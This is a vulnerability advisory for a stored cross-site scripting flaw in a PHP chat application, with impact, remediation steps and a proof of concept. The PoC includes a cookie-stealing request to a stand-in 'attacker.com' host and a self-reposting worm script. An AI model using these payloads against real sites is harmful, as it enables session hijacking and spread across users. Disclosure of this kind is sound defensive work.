### Vulnerability Overview **Affected Versions:** - Product: Chat System Using PHP - Version: 1.0 - Vendor: code-projects.org - Type: Web Application - Language: PHP - Database: MySQL **Vulnerability Information:** - Vulnerability Type: Stored Cross-Site Scripting (Stored XSS) - CWE: CWE-79 (Improper Neutralization of Input During Web Page Generation) - Severity: High - CVSS v3.1 Score: 8.7 - Attack Vector: Network - Attack Complexity: Low - Required Privileges: Low (requires a valid session to send messages) - User Interaction: Required (victim must open the chat room) - Status: Unpatched **Vulnerability Description:** A Stored Cross-Site Scripting (XSS) vulnerability was identified in the real-time chat messaging feature of Chat System Using PHP version 1.0. The attack involves two files, forming a complete injection execution chain: - **Injection**: The `msg` parameter in `send_message.php` is stored directly into the `chat` table without any sanitization, HTML encoding, or input validation. - **Execution**: In `fetch_chat.php`, when any user loads the chat room, all stored messages are retrieved and rendered using bare `echo` statements, without `htmlspecialchars()`, `htmlentities()`, or any form of output encoding. Because the payload persists in the database, it executes in every user's browser—including administrators—as long as the message record exists. A single injection creates a persistent, self-propagating attack surface. ### Impact Scope - **Session Hijacking**: Active session cookies for all users (including administrators) are exposed to the attacker when accessing the chat room. - **Persistent Attack Surface**: The payload survives server restarts until the database record is manually deleted. - **Full Administrative Privileges**: By obtaining an administrator session via stored XSS, full application control is achieved. - **Worm-like XSS**: The payload can autonomously propagate between the chat room and users. - **Phishing**: All users can be silently redirected to attacker-controlled pages. - **Keylogging**: Browser-based keyloggers can be installed within the session of each affected user. - **Cascading Impact**: Combined with VULN-001, a stolen administrator session can lead to database compromise without requiring additional credentials. ### Remediation 1. **Escape All Outputs**: Wrap every value sourced from the database with `htmlspecialchars($value, ENT_QUOTES, 'UTF-8')` before echoing in `fetch_chat.php`. 2. **Sanitize Stored Inputs**: Apply `strip_tags()` or `htmlspecialchars()` to `$_POST['msg']` in `send_message.php` before inserting it into the database. 3. **Content Security Policy (CSP)**: Deploy strict CSP headers: `Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none';` to prevent inline script execution. 4. **HttpOnly Session Cookies**: Set `session.cookie_httponly = 1` and `session.cookie_secure = 1` in `php.ini` to prevent JavaScript access to session tokens. 5. **Fix Concurrent SQL Injection**: Use prepared statements in `send_message.php` to address SQL injection issues simultaneously, preventing compound exploitation. 6. **Enforce Message Length**: Implement server-side maximum message length limits (e.g., 500 characters) to restrict payload size. 7. **Context-Aware Output**: Use template engines with automatic escaping enabled (e.g., Twig, Blade) to prevent future XSS vulnerabilities across all output contexts. ### Proof of Concept (PoC) Code **POST Request Demo:** ```http POST /admin/send_message.php HTTP/1.1 Host: localhost:8081 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=d486bce7875c6d8bc3aa2b9269691f User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Referer: http://localhost:8081/admin/chatroom.php?id=1 Connection: keep-alive msg=fetch('http://attacker.com/steal?c='+btoa(document.cookie))&id=1 ``` **Self-Propagating Worm Payload:** ```javascript var xhr=new XMLHttpRequest(); xhr.open('POST','/admin/send_message.php',true); xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded'); xhr.send('msg='+encodeURIComponent(document.currentScript.outerHTML)+'&id=1'); ``` **Alternative Payload to Bypass Basic `` Filters:** ```html ```